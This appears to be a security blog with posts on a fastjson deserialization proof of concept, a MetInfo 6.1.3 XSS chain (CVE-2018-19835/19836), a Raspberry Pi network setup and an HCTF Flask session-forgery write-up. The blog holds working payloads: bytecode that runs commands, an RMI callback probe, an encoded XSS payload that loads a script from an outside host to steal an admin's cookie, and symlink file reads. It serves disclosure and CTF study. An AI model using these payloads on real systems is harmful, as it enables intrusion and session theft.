{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADMANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMY29tL2FsaWpzb25kZXNlci9TaGVsbEV4ZWM7AQAKRXhjZXB0aW9ucwcALAEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcALQEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAF0BwAuAQAKU291cmNlRmlsZQEADlNoZWxsRXhlYy5qYXZhDAAIAAkHAC8MADAAMQEAE21rZGlyIC90bXAvaW1hZ2VtbHQMADIAMwEAGmNvbS9hbGlqc29uZGVzZXIvU2hlbGxFeGVjAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACwAAAA4AAwAAAAwABAANAA0ADgAMAAAADAABAAAADgANAA4AAAAPAAAABAABABAAAQARABIAAQAKAAAASQAAAAQAAAABsQAAAAIACwAAAAYAAQAAABEADAAAACoABAAAAAEADQAOAAAAAAABABMAFAABAAAAAQAVABYAAgAAAAEAFwAYAAMAAQARABkAAgAKAAAAPwAAAAMAAAABsQAAAAIACwAAAAYAAQAAABQADAAAACAAAwAAAAEADQAOAAAAAAABABMAFAABAAAAAQAaABsAAgAPAAAABAABABwACQAdAB4AAgAKAAAAQQACAAIAAAAJuwAFWbcABkyxAAAAAgALAAAACgACAAAAFwAIABgADAAAABYAAgAAAAkAHwAgAAAACAABACEADgABAA8AAAAEAAEAIgABACMAAAACACQ="],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}

web环境下的测试可以使用war包https://raw.githubusercontent.com/yaofeifly/vulhub/master/fastjson/vuln/fastjson-1.0.war,从tomcat后台导入。

之后我们只需要用post方式发包

POST /fastjson-1.0/ HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 2272

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADMANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABxMY29tL2FsaWpzb25kZXNlci9TaGVsbEV4ZWM7AQAKRXhjZXB0aW9ucwcALAEACXRyYW5zZm9ybQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcALQEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAF0BwAuAQAKU291cmNlRmlsZQEADlNoZWxsRXhlYy5qYXZhDAAIAAkHAC8MADAAMQEAE21rZGlyIC90bXAvaW1hZ2VtbHQMADIAMwEAGmNvbS9hbGlqc29uZGVzZXIvU2hlbGxFeGVjAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACwAAAA4AAwAAAAwABAANAA0ADgAMAAAADAABAAAADgANAA4AAAAPAAAABAABABAAAQARABIAAQAKAAAASQAAAAQAAAABsQAAAAIACwAAAAYAAQAAABEADAAAACoABAAAAAEADQAOAAAAAAABABMAFAABAAAAAQAVABYAAgAAAAEAFwAYAAMAAQARABkAAgAKAAAAPwAAAAMAAAABsQAAAAIACwAAAAYAAQAAABQADAAAACAAAwAAAAEADQAOAAAAAAABABMAFAABAAAAAQAaABsAAgAPAAAABAABABwACQAdAB4AAgAKAAAAQQACAAIAAAAJuwAFWbcABkyxAAAAAgALAAAACgACAAAAFwAIABgADAAAABYAAgAAAAkAHwAgAAAACAABACEADgABAA8AAAAEAAEAIgABACMAAAACACQ="],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}

可以看到文件夹已经被创建且与tomcat运行用户权限相同(root)。

getshell只需要先wget一个脚本再执行即可。

关于fastjson反序列化漏洞的发现我们可以让服务器发送请求到我们的公网vps：

1	{"@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://your-ip:1099/Object","autoCommit":true}

B8F7CB04-3AF7-45AC-BB48-AC90A719741A

出现如图的回显即可确认存在反序列化漏洞。

metinfo reflected xss bypass chrome

Posted on 2018-12-04 | Edited on 2019-02-02 | In Ctf , web

Metinfo latest version(6.1.3) has a reflected xss vul, with another vul which can cause arbitrary response headers set we can bypass chrome xss filter. [CVE-2018-19835 and CVE-2018-19836]

Metinfo is an powerful cms used widely in china.https://www.metinfo.cn/ recently I find two vuls and combine them we can bypass chrome’s xss filter to affect administrators.

vul1

firstly, there exists an reflected XSS in metinfo latest version(6.1.3),

url:http://127.0.0.1:8888/admin/column/move.php?foldyanzheng=1&foldername=member&lang_columnerr4=<script>alert(document.cookie)</script>&metcms=1

since no cookies protected with http-only we can directy use them.

why does this vul exists?

we check /admin/column/move.php

<?php
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. 
require_once '../login/login_check.php';
require_once 'global.func.php';
if($foldyanzheng){
	$metcms='';
	$folder_m=$db->get_one("SELECT * FROM $met_column WHERE foldername='$foldername' and lang='$lang'");
	if($folder_m)$metcms=$lang_columnerr4;
	if(!preg_match('/^[a-z0-9_-]+$/i',metdetrim($foldername)))$metcms=$lang_columnerr1;
	echo $metcms;
	die;
}

we only need $folderyanzheng>0 and$folder_m is not null, we can get $lang_columnerr4 directly shown in the dom .and just in /include/common.inc.php there exists an register of variables that can be controlled by us：

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
	foreach($$_request as $_key => $_value) {
		$_key{0} != '_' && $$_key = daddslashes($_value,0,0,1);
		$_M['form'][$_key] = daddslashes($_value,0,0,1);
	}
}

so we can controll the variable $lang_columnerr4.

but we know vuls like this can only affect browsers that have no xss protections. how do we affect browsers like chrome that have powerfull xss filters? see next vul.

vul 2

there exists an vul that enables you to set any headers in

/include/interface/applogin.php

<?php
require_once '../common.inc.php';
$query = "UPDATE {$met_config} set value='{$apppass}' where name = 'met_apppass'";
$db->get_one($query);
header("{$serverurl}");
?>

in common.inc.php there exists an operation to register all variables which can be controlled by users;

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
	foreach($$_request as $_key => $_value) {
		$_key{0} != '_' && $$_key = daddslashes($_value,0,0,1);
		$_M['form'][$_key] = daddslashes($_value,0,0,1);
	}
}

so here we can communicate this vul with vul1 to bypass chrome’s xss filter,because chrome’s xss filter donnot check data from user’s cookie.

Step1

Let administrator visit this address

http://127.0.0.1:8888/include/interface/applogin.php?serverurl=Set-Cookie%3alang_columnerr4%3d123%253cimg%20src%3dasd%20onerror%3deval(String.fromCharCode(118,97,114,32,120,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,120,46,115,114,99,61,34,47,47,120,115,115,112,116,46,99,111,109,47,80,87,87,50,65,105,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,120,41,59))%3E;path=/

we can see an responce header is set。

step2

let the administrator visit

http://127.0.0.1:8888/admin/column/move.php?foldyanzheng=1&foldername=member&metcms=1

here we can see the data in user’s cookie is shown in the dom

in my xss platform(platform to recieve xss data),we can see cookie of the manager is captured.

just want an alert?

first visit

http://127.0.0.1:8888/include/interface/applogin.php?serverurl=Set-Cookie%3alang_columnerr4%3d123%253csvg/onload%3dalert(1)%3E;path=/

secondly
http://127.0.0.1:8888/admin/column/move.php?foldyanzheng=1&foldername=member&metcms=1
now you can see an alert

用树莓派zero w做电脑的无线网卡

Posted on 2018-11-28 | Edited on 2019-02-02 | In web

Step1 设置树莓派，启动usb0接口

编辑/boot/config.txt，尾部添加：

1	dtoverlay=dwc2

编辑/boot/cmdline.txt,在rootwait后添加

1	modules-load=dwc2,g_ether

Step2 启动树莓派后设置网络

编辑/etc/network/interfaces，内容修改为

auto lo
iface lo inet loopback

iface eth0 inet manual

allow-hotplug wlan0
auto wlan0
iface wlan0 inet dhcp
wpa-conf /boot/wpa.conf

allow-hotplug usb0
auto usb0
iface usb0 inet static
address 192.168.166.1
netmask 255.255.255.0

再安装dnsmasq

1	apt install dnsmasq

编辑dnsmasq的配置文件/etc/dnsmasq.conf，去掉最后两行，改为：

1
2
3

interface=usb0
bind-interfaces
dhcp-range=192.168.166.2,192.168.166.250,24h

之后启动dnsmasq的开机自启动:

1	sudo systemctl enable dnsmasq

再创建端口转发用的脚本forward.sh,位置任意，内容为

#! /bin/bash
echo 1 >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING  -o wlan0 -j MASQUERADE
iptables -A FORWARD -i wlan0 -o usb0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i usb0 -o wlan0 -j ACCEPT

保存后在/etc/rc.local中在exit 0一行之前添加该脚本，

bash 脚本位置

修改/boot/wpa.conf,添加需要连接的热点,l例如：

network={
	ssid="image" #热点名称
	key_mgmt=WPA-PSK 
	psk="xxxxxx" #密码
	priority=5
}

enjoy it

重启后在mac和linux下可以直接识别该网路并且自动连接。需要修改热点只需要取出内存卡修改根目录下/wpa.conf文件即可。

从hctf的两道web题谈flask客户端session机制

Posted on 2018-11-12 | Edited on 2019-02-02

首发于安全客https://www.anquanke.com/post/id/163975

这次hctf中有两道获取flask的secret_key生成客户端session的题目，为了能做出这两道题目来也是深入研究了一下flask客户端session的生成机制。所以这篇文章主要详细讨论一下flask客户端session的生成以及校验过程，以及在了解了flask客户端session机制后这两道题的解法。

个人第一次见到关于客户端session的文章是pith0n师傅的一片文章客户端session导致的安全问题。然而做题的时候只看phith0n师傅的这篇文章感觉还是有点儿懵逼。。。（也可能是我太菜了233）所以就只能翻flask的源码跟了一遍flask对session的处理流程。

flask对客户端session的处理机制

flask对session的处理位于flask/sessions.py中，默认情况下flask的session以cookie的形式保存于客户端，利用签名机制来防止数据被篡改。
在flask/sessions.py中，SecureCookieSessionInterface用于封装对CookieSession的一系列操作：

class SecureCookieSessionInterface(SessionInterface):
    """The default session interface that stores sessions in signed cookies
    through the :mod:`itsdangerous` module.
    """
    # salt,默认为cookie-session
    salt = 'cookie-session'
    #: 默认哈希函数为hashlib.sha1
    digest_method = staticmethod(hashlib.sha1)
    #:默认密钥推导方式 :hmac
    key_derivation = 'hmac'
    #:默认序列化方式：session_json_serializer
    serializer = session_json_serializer
    session_class = SecureCookieSession

这里默认的序列化方式的定义为:

1	session_json_serializer = TaggedJSONSerializer()

可以看到默认使用taggedJSONSerializer做序列化
taggedJSONSerializer定义：

class TaggedJSONSerializer(object):
    """A customized JSON serializer that supports a few extra types that
    we take for granted when serializing (tuples, markup objects, datetime).
    """
    def dumps(self, value):
        def _tag(value):
            if isinstance(value, tuple):
                return {' t': [_tag(x) for x in value]}
            elif isinstance(value, uuid.UUID):
                return {' u': value.hex}
            elif isinstance(value, bytes):
                return {' b': b64encode(value).decode('ascii')}
            elif callable(getattr(value, '__html__', None)):
                return {' m': text_type(value.__html__())}
            elif isinstance(value, list):
                return [_tag(x) for x in value]
            elif isinstance(value, datetime):
                return {' d': http_date(value)}
            elif isinstance(value, dict):
                return dict((k, _tag(v)) for k, v in iteritems(value))
            elif isinstance(value, str):
                try:
                    return text_type(value)
                except UnicodeError:
                    raise UnexpectedUnicodeError(u'A byte string with '
                        u'non-ASCII data was passed to the session system '
                        u'which can only store unicode strings.  Consider '
                        u'base64 encoding your string (String was %r)' % value)
            return value
        return json.dumps(_tag(value), separators=(',', ':'))

    def loads(self, value):
        def object_hook(obj):
            if len(obj) != 1:
                return obj
            the_key, the_value = next(iteritems(obj))
            if the_key == ' t':
                return tuple(the_value)
            elif the_key == ' u':
                return uuid.UUID(the_value)
            elif the_key == ' b':
                return b64decode(the_value)
            elif the_key == ' m':
                return Markup(the_value)
            elif the_key == ' d':
                return parse_date(the_value)
            return obj
        return json.loads(value, object_hook=object_hook)

可以看到本质还是一个添加了类型属性的json处理。
SecureCookieSessionInterface类的获取签名验证序列化器函数为get_signing_serializer

def get_signing_serializer(self, app):
    if not app.secret_key:
        return None
    signer_kwargs = dict(
        key_derivation=self.key_derivation,
        digest_method=self.digest_method
    )
    return URLSafeTimedSerializer(app.secret_key, salt=self.salt,
                                  serializer=self.serializer,
                                  signer_kwargs=signer_kwargs)

可以看到最后使用的签名序列化器为URLSafeTimedSerializer，并且传入app.secret_key用于签名。
SecureCookieSessionInterface的open_session与save_session方法表示了对session的处理

def open_session(self, app, request):
    s = self.get_signing_serializer(app)
    if s is None:
        return None
    val = request.cookies.get(app.session_cookie_name)
    if not val:
        return self.session_class()
    max_age = total_seconds(app.permanent_session_lifetime)
    try:
        data = s.loads(val, max_age=max_age)#max_age
        return self.session_class(data)
    except BadSignature:
        return self.session_class()

def save_session(self, app, session, response):
    domain = self.get_cookie_domain(app)
    path = self.get_cookie_path(app)
    if not session:
        if session.modified:
            response.delete_cookie(app.session_cookie_name,
                                   domain=domain, path=path)
        return
    httponly = self.get_cookie_httponly(app)
    secure = self.get_cookie_secure(app)
    expires = self.get_expiration_time(app, session)
    print self.get_signing_serializer(app)
    val = self.get_signing_serializer(app).dumps(dict(session))
    response.set_cookie(app.session_cookie_name, val,
                        expires=expires, httponly=httponly,
                        domain=domain, path=path, secure=secure)

可以看到从客户端获取session时获取对应的cookie值，并使用序列化器序列化，能够成功序列化即可获取sesison_class,否则返回一个空的session_class.

SecureCookieSession使用的默认序列化器URLSafeTimedSeriallizer位于itsdangerous模块中：

class URLSafeTimedSerializer(URLSafeSerializerMixin, TimedSerializer):
    """Works like :class:`TimedSerializer` but dumps and loads into a URL
    safe string consisting of the upper and lowercase character of the
    alphabet as well as ``'_'``, ``'-'`` and ``'.'``.
    """
    default_serializer = compact_json

序列化

序列化的流程在TimedSerializer的父类Serializer中

def dumps(self, obj, salt=None):
    """Returns a signed string serialized with the internal serializer.
    The return value can be either a byte or unicode string depending
    on the format of the internal serializer.
    """
    payload = want_bytes(self.dump_payload(obj))
    rv = self.make_signer(salt).sign(payload)
    if self.is_text_serializer:
        rv = rv.decode('utf-8')
    return rv

可以看到主要处理流程是将obj用dump_payload签名后利用make_signer(salt)生成的signer进行签名处理，并返回签名后的结果即为我们所需要的cookie值，而URLSafeTimedSeralizer的dump_playload方法继承自URLSafeSerializerMixin的dump_payload方法

def dump_payload(self, obj):
    json = super(URLSafeSerializerMixin, self).dump_payload(obj)
 is_compressed = False
    compressed = zlib.compress(json)
    if len(compressed) < (len(json) - 1):
        json = compressed
        is_compressed = True
    base64d = base64_encode(json)
    if is_compressed:
        base64d = b'.' + base64d
    return base64d

对obj的处理首先使用URLSafeTimedSeralizer的另一个父类TimedSeralizer继承自Seralizer的dump_payload方法处理

def dump_payload(self, obj):
    """Dumps the encoded object.  The return value is always a
    bytestring.  If the internal serializer is text based the value
    will automatically be encoded to utf-8.
    """
    return want_bytes(self.serializer.dumps(obj))

其中self.serializer为之前SecureCookieSessionInterface的get_signing_serializer传入，即taggedJSONSerializer。
处理之后如果长度过长会进行一次zlib压缩，最后将生成的数据base64编码。

再回到之前Seralizer的dumps的处理流程中，self.make_signer(salt)的定义如下:

def make_signer(self, salt=None):
    """A method that creates a new instance of the signer to be used.
    The default implementation uses the :class:`Signer` baseclass.
    """
    if salt is None:
        salt = self.salt
    return self.signer(self.secret_key, salt=salt, **self.signer_kwargs)

self.salt、self.signer_kwargs、self.secret_key来自之前SecureCookieSessionInterface的get_signing_serializer传入，分别为app.secret_key、'cookie-session'、{'key_derivation':'hmac','digest_method'=staticmethod(hashlib.sha1)}，而self.signer为TimedSeralizer中指定

class TimedSerializer(Serializer):
    """Uses the :class:`TimestampSigner` instead of the default
    :meth:`Signer`.
    """

    default_signer = TimestampSigner

TimestampSigner签名过程为：

def sign(self, value):
    """Signs the given string and also attaches a time information."""
 value = want_bytes(value)
    timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
    sep = want_bytes(self.sep)
    value = value + sep + timestamp
    return value + sep + self.get_signature(value)

将传入的value拼接上时间戳之后再拼接签名内容，签名实现继承自Signer类的get_signature方法

def get_signature(self, value):
    """Returns the signature for the given value"""
    value = want_bytes(value)
    key = self.derive_key()
    sig = self.algorithm.get_signature(key, value)
    return base64_encode(sig)

因此，整个序列化的流程便是将obj处理为json格式后根据长度选择是否zlib压缩，之后再进行base64加密，拼接上当前时间戳之后再使用hmac签名并且拼接到该字符串上即为我们所需要的payload。

反序列化

反签名的流程主要为TimedSerializer类的loads函数

class TimedSerializer(Serializer):
    """Uses the :class:`TimestampSigner` instead of the default
    :meth:`Signer`.
    """

    default_signer = TimestampSigner

    def loads(self, s, max_age=None, return_timestamp=False, salt=None):
        """Reverse of :meth:`dumps`, raises :exc:`BadSignature` if the
        signature validation fails.  If a `max_age` is provided it will
        ensure the signature is not older than that time in seconds.  In
        case the signature is outdated, :exc:`SignatureExpired` is raised
        which is a subclass of :exc:`BadSignature`.  All arguments are
        forwarded to the signer's :meth:`~TimestampSigner.unsign` method.
        """
        base64d, timestamp = self.make_signer(salt) \
            .unsign(s, max_age, return_timestamp=True)
        payload = self.load_payload(base64d)
        if return_timestamp:
            return payload, timestamp
        return payload

    def loads_unsafe(self, s, max_age=None, salt=None):
        load_kwargs = {'max_age': max_age}
        load_payload_kwargs = {}
        return self._loads_unsafe_impl(s, salt, load_kwargs, load_payload_kwargs)

这里的loads部分使用TimestampSigner来对传入的数据进行解析，查看TimestampSinger中关于签名与反签名的源码：

def sign(self, value):
    """Signs the given string and also attaches a time information."""
 value = want_bytes(value)
    timestamp = base64_encode(int_to_bytes(self.get_timestamp()))
    sep = want_bytes(self.sep)
    value = value + sep + timestamp
    return value + sep + self.get_signature(value)

   def unsign(self, value, max_age=None, return_timestamp=False):
    """Works like the regular :meth:`~Signer.unsign` but can also
    validate the time.  See the base docstring of the class for
    the general behavior.  If `return_timestamp` is set to `True`
    the timestamp of the signature will be returned as naive
    :class:`datetime.datetime` object in UTC.
    """
    try:
        result = Signer.unsign(self, value)
        sig_error = None
    except BadSignature as e:
        sig_error = e
        result = e.payload or b''
    sep = want_bytes(self.sep)

    # If there is no timestamp in the result there is something
    # seriously wrong.  In case there was a signature error, we raise
    # that one directly, otherwise we have a weird situation in which
    # we shouldn't have come except someone uses a time-based serializer
    # on non-timestamp data, so catch that.
    if not sep in result:
        if sig_error:
            raise sig_error
        raise BadTimeSignature('timestamp missing', payload=result)

    value, timestamp = result.rsplit(sep, 1)
    try:
        timestamp = bytes_to_int(base64_decode(timestamp))
    except Exception:
        timestamp = None

    # Signature is *not* okay.  Raise a proper error now that we have
    # split the value and the timestamp.
    if sig_error is not None:
        raise BadTimeSignature(text_type(sig_error), payload=value,
                               date_signed=timestamp)

    # Signature was okay but the timestamp is actually not there or
    # malformed.  Should not happen, but well.  We handle it nonetheless
    #检查timestamp
    if timestamp is None:
        raise BadTimeSignature('Malformed timestamp', payload=value)

    # Check timestamp is not older than max_age
    if max_age is not None:
        age = self.get_timestamp() - timestamp
        if age > max_age:
            raise SignatureExpired(
                'Signature age %s > %s seconds' % (age, max_age),
                payload=value,
                date_signed=self.timestamp_to_datetime(timestamp))

    if return_timestamp:
        return value, self.timestamp_to_datetime(timestamp)
    return value

unsigin过程直接调用父类Signer的unsign,再进行timestamp的检查，由于之前调用时传入了max_age所以会检查timestamp是否超时（当时没注意到这一点一直以为随便一个timestamp就可以结果gg了。。。）

序列化与反序列化的总结

最后经过flask处理的字符串的格式为：

json->zlib->base64后的源字符串 . 时间戳 . hmac签名信息

对于以上的调用我们可以总结为这样的代码(与服务器上的python版本无关，如果不确定服务器运行环境timestamp最好根据服务器反馈获取)：

from itsdangerous import *
from flask.sessions import *


key='*******'
salt="cookie-session"
serializer=session_json_serializer
digest_method=hashlib.sha1
key_derivation='hmac'

signer_kwargs = dict(
            key_derivation=key_derivation,
            digest_method=digest_method
        )


def serialize(obj,timestamp,sep):
        my_serializer=URLSafeTimedSerializer(key,salt=salt,serializer=serializer,signer_kwargs=signer_kwargs)
        base64d=my_serializer.dump_payload(obj) #数据压缩
        data=base64d+sep+timestamp #拼接timestamp
        result=data+sep+my_serializer.make_signer(salt).get_signature(data) #拼接签名内容
        return result

而从cookie获取session的过程便是验证签名->验证是否过期->解码，解码可以使用phith0n师傅的payload：

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

需要特别注意的是python2与python3下产生的timestamp是不一样的！！！当时被这个问题坑了很久。。。

hctf两道题目的wp

有了以上的分析要解决hctf的这两道题目就很容易了：

admin

http://admin.2018.hctf.io/index

这道题目我们能做出来是因为在github上搜索hctf,按照recent updated得到了题目的repohttps://github.com/woadsl1234/hctf_flask

repo中暴露了私钥信息,而且题目只需要能用admin用户登入即可，因此可以直接使用上面的脚本跑出admin用户的session来。

hide and seek

http://hideandseek.2018.hctf.io/

这道题目中登入后会要求我们上传一个zip文件,如果zip文件内的所有文件都是文本文件便可以成功返回文件的内容。
然而zip文件中也可以包含软链接,采用zip -ry out.zip link即可将一个软链接打包到out.zip中。因此我们可以尝试上传包含/proc/self/environ软链接的压缩包来获取一些运行环境信息

1 2	ln -s /proc/self/environ link zip -ry out.zip link

上传后可以获得当前一些环境信息：
png1
可以发现uwsgi配置文件的路径/app/it_is_hard_t0_guess_the_path_but_y0u_find_it_5f9s5b5s9.ini,尝试读取配置文件

1
2
3

[uwsgi]
module = hard_t0_guess_n9f5a95b5ku9fg.hard_t0_guess_also_df45v48ytj9_main
callable=app

可以得知当前脚本为/app/hard_t0_guess_n9f5a95b5ku9fg/hard_t0_guess_also_df45v48ytj9_main.py
从而获取到源码

# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import flag
from werkzeug.utils import secure_filename
import os
random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024
ALLOWED_EXTENSIONS = set(['zip'])

def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    error = request.args.get('error', '')
    if(error == '1'):
        session.pop('username', None)
        return render_template('index.html', forbidden=1)

    if 'username' in session:
        return render_template('index.html', user=session['username'], flag=flag.flag)
    else:
        return render_template('index.html')


@app.route('/login', methods=['POST'])
def login():
    username=request.form['username']
    password=request.form['password']
    if request.method == 'POST' and username != '' and password != '':
        if(username == 'admin'):
            return redirect(url_for('index',error=1))
        session['username'] = username
    return redirect(url_for('index'))


@app.route('/logout', methods=['GET'])
def logout():
    session.pop('username', None)
    return redirect(url_for('index'))

@app.route('/upload', methods=['POST'])
def upload_file():
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'


    try:
        extract_path = file_save_path + '_'
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        file = None

    os.remove(file_save_path)
    if(file != None):
        if(file.find(base64.b64decode('aGN0Zg==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    #app.run(debug=True)
    app.run(host='127.0.0.1', debug=True, port=10008)

然而并无法获取flag.py的源码，因为限制了内容不能包含hctf。
尝试获取/app/hard_t0_guess_n9f5a95b5ku9fg/templates/index.html
可以得知只要能用admin登入即可获得flag.

这里我们重点查看payload中SECRET_KEY的生成方式

1
2
3

random.seed(uuid.getnode())
app = Flask(__name__)
app.config['SECRET_KEY'] = str(random.random()*100)

可以看到随机数的种子为uuid.getnode().而uuid.getnode()函数返回的便是当前网卡的mac地址。那么要怎样获取服务器上的网卡地址?
